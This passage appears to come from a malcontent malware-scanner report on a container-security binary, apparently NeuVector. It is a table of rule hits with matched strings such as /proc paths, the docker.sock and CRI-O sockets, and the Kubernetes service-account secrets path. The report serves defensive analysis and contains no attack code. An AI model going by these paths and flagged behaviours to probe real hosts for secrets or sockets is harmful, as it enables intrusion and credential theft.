[/proc/1/net/etc/login.defs/proc/](https://github.com/search?q=%2Fproc%2F1%2Fnet%2Fetc%2Flogin.defs%2Fproc%2F&type=code)
[/proc/1/root/containers](https://github.com/search?q=%2Fproc%2F1%2Froot%2Fcontainers&type=code)
[/proc/1/root/etc/crio/crio.conf.d/00-d](https://github.com/search?q=%2Fproc%2F1%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-d&type=code)
[/proc/1/root/etc/crio/crio.conf/run/co](https://github.com/search?q=%2Fproc%2F1%2Froot%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fco&type=code)
[/proc/1/root/sys/fs/aufs/si_](https://github.com/search?q=%2Fproc%2F1%2Froot%2Fsys%2Ffs%2Faufs%2Fsi_&type=code)
[/proc/1/rootFSN](https://github.com/search?q=%2Fproc%2F1%2FrootFSN&type=code)
[/proc/cpuinfo/proc/meminfo/etc/timezon](https://github.com/search?q=%2Fproc%2Fcpuinfo%2Fproc%2Fmeminfo%2Fetc%2Ftimezon&type=code)
[/proc/device_only/etc/shellssubmission](https://github.com/search?q=%2Fproc%2Fdevice_only%2Fetc%2Fshellssubmission&type=code)
[/proc/errno](https://github.com/search?q=%2Fproc%2Ferrno&type=code)
[/proc/meminfo/etc/timezone/dev/.udev/d](https://github.com/search?q=%2Fproc%2Fmeminfo%2Fetc%2Ftimezone%2Fdev%2F.udev%2Fd&type=code)
[/proc/mountsldb](https://github.com/search?q=%2Fproc%2Fmountsldb&type=code)
[/proc/self/auxv](https://github.com/search?q=%2Fproc%2Fself%2Fauxv&type=code)
[/proc/self/cgroup119209289550781255960](https://github.com/search?q=%2Fproc%2Fself%2Fcgroup119209289550781255960&type=code)
[/proc/self/exeunsafe.Pointer](https://github.com/search?q=%2Fproc%2Fself%2Fexeunsafe.Pointer&type=code)
[/proc/self/fd/](https://github.com/search?q=%2Fproc%2Fself%2Ffd%2F&type=code)
[/proc/self/gid_map](https://github.com/search?q=%2Fproc%2Fself%2Fgid_map&type=code)
[/proc/self/mapsGNU.sparse.nameGNU.spar](https://github.com/search?q=%2Fproc%2Fself%2FmapsGNU.sparse.nameGNU.spar&type=code)
[/proc/self/mountinfowindow](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfowindow&type=code)
[/proc/self/setgroups](https://github.com/search?q=%2Fproc%2Fself%2Fsetgroups&type=code)
[/proc/self/statusgogoproto.onlyonegogo](https://github.com/search?q=%2Fproc%2Fself%2Fstatusgogoproto.onlyonegogo&type=code)
[/proc/self/uid_mapCAP_SYS_TTY_CONFIGgo](https://github.com/search?q=%2Fproc%2Fself%2Fuid_mapCAP_SYS_TTY_CONFIGgo&type=code)
[/proc/selfjumboframekube-proxyhost-ben](https://github.com/search?q=%2Fproc%2Fselfjumboframekube-proxyhost-ben&type=code)
[/proc/sys/kernel/hostnamereflect](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostnamereflect&type=code)
[/proc/sys/kernel/osrelease../devices/p](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fosrelease..%2Fdevices%2Fp&type=code)
[/proc/sys/kernel/versionzip](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fversionzip&type=code)
[/proc/sys/net/core/somaxconn1818989403](https://github.com/search?q=%2Fproc%2Fsys%2Fnet%2Fcore%2Fsomaxconn1818989403&type=code)
[/proc/var//sbinpInfo/rootSwarmD.2.5D.2](https://github.com/search?q=%2Fproc%2Fvar%2F%2FsbinpInfo%2FrootSwarmD.2.5D.2&type=code)
[/sys/class/dmi/id/bios_date/lib64/ld-linux](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fbios_date%2Flib64%2Fld-linux&type=code)
[/sys/class/dmi/id/bios_vendorruntime.v1alp](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fbios_vendorruntime.v1alp&type=code)
[/sys/class/dmi/id/bios_version/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fbios_version%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/board_asset_tag/sys/clas](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_asset_tag%2Fsys%2Fclas&type=code)
[/sys/class/dmi/id/board_name/sys/firmware/](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_name%2Fsys%2Ffirmware%2F&type=code)
[/sys/class/dmi/id/board_serial/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_serial%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/board_vendor/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_vendor%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/board_versionruntime.v1a](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_versionruntime.v1a&type=code)
[/sys/class/dmi/id/chassis_asset_tagruntime](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_asset_tagruntime&type=code)
[/sys/class/dmi/id/chassis_serial/sys/class](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_serial%2Fsys%2Fclass&type=code)
[/sys/class/dmi/id/chassis_type/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_type%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/chassis_vendor/sys/class](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_vendor%2Fsys%2Fclass&type=code)
[/sys/class/dmi/id/chassis_version/sys/clas](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_version%2Fsys%2Fclas&type=code)
[/sys/class/dmi/id/product_name/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_name%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/product_serialruntime.v1](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_serialruntime.v1&type=code)
[/sys/class/dmi/id/product_uuidruntime.v1al](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_uuidruntime.v1al&type=code)
[/sys/class/dmi/id/product_versionruntime.v](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_versionruntime.v&type=code)
[/sys/class/dmi/id/sys_vendorruntime.v1alph](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fsys_vendorruntime.v1alph&type=code)
[/sys/class/net/run/udev/data/](https://github.com/search?q=%2Fsys%2Fclass%2Fnet%2Frun%2Fudev%2Fdata%2F&type=code)
[/sys/devices/system/xen_memory/xen_memory0/t](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fxen_memory%2Fxen_memory0%2Ft&type=code)
[/tmp/cis-1.23/kube-apiservercontainer](https://github.com/search?q=%2Ftmp%2Fcis-1.23%2Fkube-apiservercontainer&type=code)
[/tmp/cis-1.24//tmp/cis-1.23/kube-apis](https://github.com/search?q=%2Ftmp%2Fcis-1.24%2F%2Ftmp%2Fcis-1.23%2Fkube-apis&type=code)
[/tmp/cis-1.8.0//tmp/cis-1.6.0/run](https://github.com/search?q=%2Ftmp%2Fcis-1.8.0%2F%2Ftmp%2Fcis-1.6.0%2Frun&type=code)
[/tmp/container.shfile](https://github.com/search?q=%2Ftmp%2Fcontainer.shfile&type=code)
[/tmp/ctrl_listen.sockFailed](https://github.com/search?q=%2Ftmp%2Fctrl_listen.sockFailed&type=code)
[/tmp/dp_client.](https://github.com/search?q=%2Ftmp%2Fdp_client.&type=code)
[/tmp/dp_listen.sockRead](https://github.com/search?q=%2Ftmp%2Fdp_listen.sockRead&type=code)
[/tmp/host.shInactiveAnonobject/host/b](https://github.com/search?q=%2Ftmp%2Fhost.shInactiveAnonobject%2Fhost%2Fb&type=code)
[/tmp/kube_master.sh/tmp/kube_worker.s](https://github.com/search?q=%2Ftmp%2Fkube_master.sh%2Ftmp%2Fkube_worker.s&type=code)
[/tmp/kube_worker.sh](https://github.com/search?q=%2Ftmp%2Fkube_worker.sh&type=code)
[/tmp/neuvector/consul.json](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fconsul.json&type=code)
[/tmp/neuvector/raft/peers.json/etc/ne](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fraft%2Fpeers.json%2Fetc%2Fne&type=code)
[/tmp/neuvectorcan](https://github.com/search?q=%2Ftmp%2Fneuvectorcan&type=code)
[/tmp/ready](https://github.com/search?q=%2Ftmp%2Fready&type=code)
[/tmp/rh-1.4.0//tmp/cis-1.24//tmp/cis-](https://github.com/search?q=%2Ftmp%2Frh-1.4.0%2F%2Ftmp%2Fcis-1.24%2F%2Ftmp%2Fcis-&type=code)
[/tmp/walkWorkload](https://github.com/search?q=%2Ftmp%2FwalkWorkload&type=code)
[/usr/bin/calico-nodePROC](https://github.com/search?q=%2Fusr%2Fbin%2Fcalico-nodePROC&type=code)
[/usr/bin/csp-billing-adapterio.kubernete](https://github.com/search?q=%2Fusr%2Fbin%2Fcsp-billing-adapterio.kubernete&type=code)
[/usr/bin/curliptables-savegraceful_stop](https://github.com/search?q=%2Fusr%2Fbin%2Fcurliptables-savegraceful_stop&type=code)
[/usr/bin/getconf/usr/bin/timeoutcontext](https://github.com/search?q=%2Fusr%2Fbin%2Fgetconf%2Fusr%2Fbin%2Ftimeoutcontext&type=code)
[/usr/bin/getentduplicated](https://github.com/search?q=%2Fusr%2Fbin%2Fgetentduplicated&type=code)
[/usr/bin/jqsupervisord.WithCancelgrpc.Se](https://github.com/search?q=%2Fusr%2Fbin%2Fjqsupervisord.WithCancelgrpc.Se&type=code)
[/usr/bin/lsof/usr/bin/curliptables-saveg](https://github.com/search?q=%2Fusr%2Fbin%2Flsof%2Fusr%2Fbin%2Fcurliptables-saveg&type=code)
[/usr/bin/pod/sbin/sysctl/usr/bin/topconf](https://github.com/search?q=%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconf&type=code)
[/usr/bin/supervisordAdd](https://github.com/search?q=%2Fusr%2Fbin%2FsupervisordAdd&type=code)
[/usr/bin/tee/usr/bin/pod/sbin/sysctl/usr](https://github.com/search?q=%2Fusr%2Fbin%2Ftee%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr&type=code)
[/usr/bin/topconfigure.shcontext.TODOcont](https://github.com/search?q=%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcont&type=code)
[/usr/bin/uname/usr/bin/iconvPROC](https://github.com/search?q=%2Fusr%2Fbin%2Funame%2Fusr%2Fbin%2FiconvPROC&type=code)
[/usr/binfan_testcapBlockprocPathfullPath](https://github.com/search?q=%2Fusr%2Fbinfan_testcapBlockprocPathfullPath&type=code)
[/var/run/cri-dockerd.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcri-dockerd.sockFile&type=code)
[/var/run/crio/crio.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2Fcrio.sockFile&type=code)
[/var/run/docker.sock/var/lib/dpkg/status](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2Fvar%2Flib%2Fdpkg%2Fstatus&type=code)
[/var/run/dockershim.sock/var/lib/rpm/Pac](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2Fvar%2Flib%2Frpm%2FPac&type=code)
[/var/run/openvswitch/Error](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2FError&type=code)
[/var/run/openvswitch/db.sockNotify](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2Fdb.sockNotify&type=code)
[/var/run/secrets/kubernetes.io/serviceac](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceac&type=code)
[sysctl,](https://github.com/search?q=sysctl%2C&type=code) | -| MEDIUM | [combo/net/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) | -| MEDIUM | [combo/net/tunnel_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code) | -| MEDIUM | [data/embedded/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-zstd.yara#embedded_zstd) | [Contains compressed content in ZStandard format](https://github.com/facebook/zstd) | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code) | -| MEDIUM | [databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | -| MEDIUM | [databases/postgresql](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/postgresql.yara#postgresql) | accesses PostgreSQL databases | [postgresql](https://github.com/search?q=postgresql&type=code) | -| MEDIUM | [databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite3](https://github.com/search?q=sqlite3&type=code) | -| MEDIUM | [evasion/content/length/0](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd.yara#exec) | executes a command | [evaluateRuntimeCmd](https://github.com/search?q=evaluateRuntimeCmd&type=code)
[isAllowIpRuntimeCommand](https://github.com/search?q=isAllowIpRuntimeCommand&type=code)
[isAllowRuncInitCommand](https://github.com/search?q=isAllowRuncInitCommand&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | -| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | -| MEDIUM | [fs/file/times/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-times-set.yara#utimes) | [change file last access and modification times](https://linux.die.net/man/2/utimes) | [utimes](https://github.com/search?q=utimes&type=code) | -| MEDIUM | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-chown.yara#Chown) | Changes file ownership | [Chown](https://github.com/search?q=Chown&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [Chmod](https://github.com/search?q=Chmod&type=code)
[chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [kernel/apparmor](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/apparmor.yara#apparmor) | Mentions 'apparmor' | [apparmor](https://github.com/search?q=apparmor&type=code) | -| MEDIUM | [kernel/dev/block/device](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/dev/block-device.yara#block_devices) | works with block devices | [/sys/blocktimestampsdocker](https://github.com/search?q=%2Fsys%2Fblocktimestampsdocker&type=code) | -| MEDIUM | [kernel/dev/loopback](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/dev/loopback.yara#dev_loopback) | access virtual block devices (loopback) | [/dev/loop%dfusermount3low](https://github.com/search?q=%2Fdev%2Floop%25dfusermount3low&type=code) | -| MEDIUM | [kernel/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | -| MEDIUM | [net/bpf](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/bpf.yara#bpf) | BPF (Berkeley Packet Filter) | [bpf](https://github.com/search?q=bpf&type=code) | -| MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | -| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download.yara#download) | download files | [CLUSSnifferDownloadshare](https://github.com/search?q=CLUSSnifferDownloadshare&type=code)
[MaxConcurrentDownloads](https://github.com/search?q=MaxConcurrentDownloads&type=code)
[portsessionsdownloadruleslen](https://github.com/search?q=portsessionsdownloadruleslen&type=code) | -| MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code) | -| MEDIUM | [net/http/form/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping not acked within timeout](https://github.com/search?q=ping+not+acked+within+timeout&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-parse.yara#ip_go) | parses IP address (IPv4 or IPv6) | [IsLinkLocalUnicast](https://github.com/search?q=IsLinkLocalUnicast&type=code)
[IsSingleIP](https://github.com/search?q=IsSingleIP&type=code) | -| MEDIUM | [net/mac/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code)
[macAddress](https://github.com/search?q=macAddress&type=code) | -| MEDIUM | [net/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | -| MEDIUM | [net/socket/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-connect.yara#_connect) | [initiate a connection on a socket](https://linux.die.net/man/3/connect) | [_connect](https://github.com/search?q=_connect&type=code) | -| MEDIUM | [net/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/stat.yara#netstat) | Uses 'netstat' for network information | [netstatmodinfonil keyde](https://github.com/search?q=netstatmodinfonil+keyde&type=code) | -| MEDIUM | [net/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/upload.yara#upload) | uploads files | [UploadUUID](https://github.com/search?q=UploadUUID&type=code)
[UploadedLayers](https://github.com/search?q=UploadedLayers&type=code)
[uploadCurrentInfo](https://github.com/search?q=uploadCurrentInfo&type=code)
[uploadgoogle](https://github.com/search?q=uploadgoogle&type=code)
[uploads](https://github.com/search?q=uploads&type=code) | -| MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url-encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | -| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url-request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | -| MEDIUM | [process/name/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | -| MEDIUM | [procfs/arbitrary/pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/mounts/sys](https://github.com/search?q=%2Fproc%2F%25d%2Fmounts%2Fsys&type=code)
[/proc/%d/root/kube](https://github.com/search?q=%2Fproc%2F%25d%2Froot%2Fkube&type=code)
[/proc/%d/rootFA](https://github.com/search?q=%2Fproc%2F%25d%2FrootFA&type=code)
[/proc/%d/task/](https://github.com/search?q=%2Fproc%2F%25d%2Ftask%2F&type=code)
[/proc/%dcopy](https://github.com/search?q=%2Fproc%2F%25dcopy&type=code)
[/proc/%v/stat](https://github.com/search?q=%2Fproc%2F%25v%2Fstat&type=code) | -| MEDIUM | [procfs/cpuinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/cpuinfo.yara#proc_cpuinfo) | get CPU info | [/proc/cpuinfo](https://github.com/search?q=%2Fproc%2Fcpuinfo&type=code) | -| MEDIUM | [procfs/self/cgroup](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/self-cgroup.yara#pid_self_cgroup) | accesses /proc files within own cgroup | [/proc/self/cgroup](https://github.com/search?q=%2Fproc%2Fself%2Fcgroup&type=code) | -| MEDIUM | [procfs/self/mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) | -| MEDIUM | [ref/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/daemon.yara#daemon) | Run as a background daemon | [build-daemon](https://github.com/search?q=build-daemon&type=code)
[docker_daemon](https://github.com/search?q=docker_daemon&type=code) | -| MEDIUM | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[attachPort](https://github.com/search?q=attachPort&type=code)
[clientPort](https://github.com/search?q=clientPort&type=code)
[cluster_ip](https://github.com/search?q=cluster_ip&type=code)
[del_port](https://github.com/search?q=del_port&type=code)
[detachPort](https://github.com/search?q=detachPort&type=code)
[dstPort](https://github.com/search?q=dstPort&type=code)
[dst_ip](https://github.com/search?q=dst_ip&type=code)
[dst_port](https://github.com/search?q=dst_port&type=code)
[exPort](https://github.com/search?q=exPort&type=code)
[fqdn_ip](https://github.com/search?q=fqdn_ip&type=code)
[global_ip](https://github.com/search?q=global_ip&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[hostIp](https://github.com/search?q=hostIp&type=code)
[hostPort](https://github.com/search?q=hostPort&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inPort](https://github.com/search?q=inPort&type=code)
[in_port](https://github.com/search?q=in_port&type=code)
[ipPort](https://github.com/search?q=ipPort&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[nat_ip](https://github.com/search?q=nat_ip&type=code)
[nat_port](https://github.com/search?q=nat_port&type=code)
[nfq_port](https://github.com/search?q=nfq_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[readPort](https://github.com/search?q=readPort&type=code)
[remote_ip](https://github.com/search?q=remote_ip&type=code)
[remote_port](https://github.com/search?q=remote_port&type=code)
[rpcPort](https://github.com/search?q=rpcPort&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[srcPort](https://github.com/search?q=srcPort&type=code)
[src_ip](https://github.com/search?q=src_ip&type=code)
[src_port](https://github.com/search?q=src_port&type=code)
[srvc_port](https://github.com/search?q=srvc_port&type=code)
[syslog_ip](https://github.com/search?q=syslog_ip&type=code)
[syslog_port](https://github.com/search?q=syslog_port&type=code)
[tap_port](https://github.com/search?q=tap_port&type=code)
[unkn_ip](https://github.com/search?q=unkn_ip&type=code)
[unknown_ip](https://github.com/search?q=unknown_ip&type=code) | -| MEDIUM | [ref/path/etc/hosts](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc-hosts.yara#etc_hosts) | references /etc/hosts | [/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code) | -| MEDIUM | [ref/path/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/hidden.yara#static_hidden_path) | hidden path in a system directory | [/meminfo/etc/timezone/dev/.udev](https://github.com/search?q=%2Fmeminfo%2Fetc%2Ftimezone%2Fdev%2F.udev&type=code)
[/usr/local/bin/.nvcontainerRunnin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunnin&type=code) | -| MEDIUM | [ref/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/home.yara#home_path) | references path within /home | [/home/.](https://github.com/search?q=%2Fhome%2F.&type=code) | -| MEDIUM | [ref/path/root](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/root.yara#root_path_val) | path reference within /root | [/root/%shostLookupOrder](https://github.com/search?q=%2Froot%2F%25shostLookupOrder&type=code)
[/root//proc/self/cgroup1192092895507812559604644775390625invalid](https://github.com/search?q=%2Froot%2F%2Fproc%2Fself%2Fcgroup1192092895507812559604644775390625invalid&type=code)
[/root/0x%08xcountsAliyunD.2.14D.3.10D.3.11D.3.12D.3.13D.3.14D.3.15D.3.](https://github.com/search?q=%2Froot%2F0x%2508xcountsAliyunD.2.14D.3.10D.3.11D.3.12D.3.13D.3.14D.3.15D.3.&type=code)
[/root/Switch](https://github.com/search?q=%2Froot%2FSwitch&type=code)
[/root/containers](https://github.com/search?q=%2Froot%2Fcontainers&type=code)
[/root/etc/crio/crio.conf.d/00-default.confUnable](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-default.confUnable&type=code)
[/root/etc/crio/crio.conf.d/00-defaultRunning](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-defaultRunning&type=code)
[/root/etc/crio/crio.conf/run/containerd/containerd.sockDirectory](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fcontainerd%2Fcontainerd.sockDirectory&type=code)
[/root/etc/hostnameusr/lib/os-releaseetc/centos-releaseetc/redhat-relea](https://github.com/search?q=%2Froot%2Fetc%2Fhostnameusr%2Flib%2Fos-releaseetc%2Fcentos-releaseetc%2Fredhat-relea&type=code)
[/root/etc/hostsImage](https://github.com/search?q=%2Froot%2Fetc%2FhostsImage&type=code)
[/root/etc/resolv.confFMON](https://github.com/search?q=%2Froot%2Fetc%2Fresolv.confFMON&type=code)
[/root/kube-schedulerUnknown](https://github.com/search?q=%2Froot%2Fkube-schedulerUnknown&type=code)
[/root/sys/fs/aufs/si_%s227373675443232059478759765625SendMsg](https://github.com/search?q=%2Froot%2Fsys%2Ffs%2Faufs%2Fsi_%25s227373675443232059478759765625SendMsg&type=code) | -| MEDIUM | [ref/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/cis-1.8.0//tmp/cis-1.6.0/run](https://github.com/search?q=%2Ftmp%2Fcis-1.8.0%2F%2Ftmp%2Fcis-1.6.0%2Frun&type=code)
[/tmp/container.shfile](https://github.com/search?q=%2Ftmp%2Fcontainer.shfile&type=code)
[/tmp/ctrl_listen.sockFailed](https://github.com/search?q=%2Ftmp%2Fctrl_listen.sockFailed&type=code)
[/tmp/dp_client.%d4e](https://github.com/search?q=%2Ftmp%2Fdp_client.%25d4e&type=code)
[/tmp/dp_listen.sockRead](https://github.com/search?q=%2Ftmp%2Fdp_listen.sockRead&type=code)
[/tmp/host.shInactiveAnonobject/host/block_accessGRP](https://github.com/search?q=%2Ftmp%2Fhost.shInactiveAnonobject%2Fhost%2Fblock_accessGRP&type=code)
